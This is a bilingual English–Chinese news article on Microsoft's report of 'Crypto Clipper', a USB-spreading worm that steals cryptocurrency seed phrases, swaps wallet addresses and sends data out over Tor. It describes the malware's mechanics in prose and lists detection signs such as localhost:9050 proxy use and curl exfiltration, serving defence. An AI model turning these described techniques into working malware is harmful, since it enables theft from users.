Microsoft discovers new lightweight backdoor that steals cryptocurrency
Microsoft discovers new lightweight backdoor that steals cryptocurrency
微软发现一种窃取加密货币的新型轻量级后门
Microsoft says it has detected new self-propagating malware that spreads through USB drives in search of cryptocurrency credentials, which it then sends to attacker-controlled servers. The company named the worm Crypto Clipper because it monitors the contents of device clipboards for patterns consistent with wallet addresses or seed phrases. When found, the malware also takes five screenshots over a 10-second period.
微软表示,已检测到一种新型自我传播恶意软件,它通过 USB 驱动器传播,旨在搜寻加密货币凭据,并将其发送至攻击者控制的服务器。该公司将这种蠕虫病毒命名为“Crypto Clipper”,因为它会监控设备剪贴板的内容,寻找符合钱包地址或助记词格式的模式。一旦发现,该恶意软件还会在 10 秒内截取五张屏幕截图。
Both the credentials and the screenshots are then sent to the attacker through Tor, a network protocol that provides anonymous routing by sending traffic through redundant nodes so logs can’t capture both the sending and receiving IP addresses. Crypto Clipper establishes the Tor connection by using a SOCKS5 proxy, a network protocol that sends traffic through a proxy server, which then forwards it to its final destination.
凭据和截图随后会通过 Tor 发送给攻击者。Tor 是一种网络协议,通过冗余节点发送流量来提供匿名路由,从而使日志无法同时捕获发送方和接收方的 IP 地址。Crypto Clipper 通过使用 SOCKS5 代理建立 Tor 连接,这是一种通过代理服务器发送流量,然后再将其转发到最终目的地的网络协议。
A lightweight backdoor
轻量级后门
“The execution of this clipper is notable because it does not depend on a traditional installer or exposed IP-based C2 infrastructure,” Microsoft said Thursday. “Instead, it deploys a portable Tor client, routes traffic through a local SOCKS5 proxy, and blends data theft with remote code execution, turning a financially motivated stealer into a lightweight backdoor.”
微软周四表示:“该剪贴板窃取程序的执行方式值得注意,因为它不依赖传统的安装程序或暴露的基于 IP 的命令与控制(C2)基础设施。相反,它部署了一个便携式 Tor 客户端,通过本地 SOCKS5 代理路由流量,并将数据窃取与远程代码执行相结合,从而将一个以经济利益为动机的窃取程序变成了一个轻量级后门。”
Microsoft said it observed Crypto Clipper spreading through .lnk file on a USB drive. These files store executable code. When an infected USB drive is plugged into a device, the code checks whether it is already installed on the machine. If it isn’t, the malware downloads it through the Tor proxy. To better conceal evidence of the worm, the malware scans the infected USB drive and names the .lnk files with similar names.
微软表示,观察到 Crypto Clipper 通过 USB 驱动器上的 .lnk 文件进行传播。这些文件存储了可执行代码。当受感染的 USB 驱动器插入设备时,代码会检查其是否已安装在机器上。如果没有,恶意软件会通过 Tor 代理下载它。为了更好地掩盖蠕虫的痕迹,该恶意软件会扫描受感染的 USB 驱动器,并使用相似的名称来命名这些 .lnk 文件。
Crypto Clipper monitors clipboard contents for patterns that are consistent with standardized 12- or 24-word seed phrases. When found, it uploads them, along with the screenshots, to the attacker’s server. The stealer also replaces addresses it finds with ones belonging to attacker-controlled wallets. This allows the malware to divert payments to the attacker’s pockets. Microsoft believes the purpose of the screenshots is to provide context that may be useful.
Crypto Clipper 会监控剪贴板内容,寻找符合标准化 12 或 24 词助记词格式的模式。一旦发现,它会将这些信息连同截图一起上传到攻击者的服务器。该窃取程序还会将发现的地址替换为攻击者控制的钱包地址。这使得恶意软件能够将支付款项转移到攻击者的口袋中。微软认为,截图的目的是为了提供可能有用的上下文信息。
“This malware family shows how lightweight, script-based stealers can deliver outsized impact when paired with anonymized communications and runtime tasking,” Microsoft said. “The combination of Tor-routed C2, clipboard targeting, screenshot capture, and remote code execution gives attackers both immediate monetization paths and continued control over compromised devices.”
微软表示:“这个恶意软件家族展示了轻量级、基于脚本的窃取程序在结合匿名通信和运行时任务处理时,如何能产生巨大的影响。Tor 路由的 C2、剪贴板定位、屏幕截图捕获和远程代码执行的组合,既为攻击者提供了直接的变现途径,也让他们能够持续控制受感染的设备。”
Microsoft Defender for Endpoint detects Crypto Clipper components as Suspicious JavaScript processes and Possible data exfiltrations using Curl. Microsoft Defender Antivirus detects it as Trojan: Win32/CryptoBandits.A. More generically, the strongest indications of infection are script interpreters spawning suspicious child processes, proxy usage on localhost:9050, screen-capture commands in PowerShell, and signs of clipboard inspection or crypto-address replacement.
Microsoft Defender for Endpoint 将 Crypto Clipper 组件检测为“可疑 JavaScript 进程”和“使用 Curl 进行的潜在数据外泄”。Microsoft Defender Antivirus 将其检测为“Trojan: Win32/CryptoBandits.A”。更广泛地说,感染的最强迹象包括:脚本解释器生成可疑子进程、localhost:9050 上的代理使用、PowerShell 中的屏幕捕获命令,以及剪贴板检查或加密货币地址替换的迹象。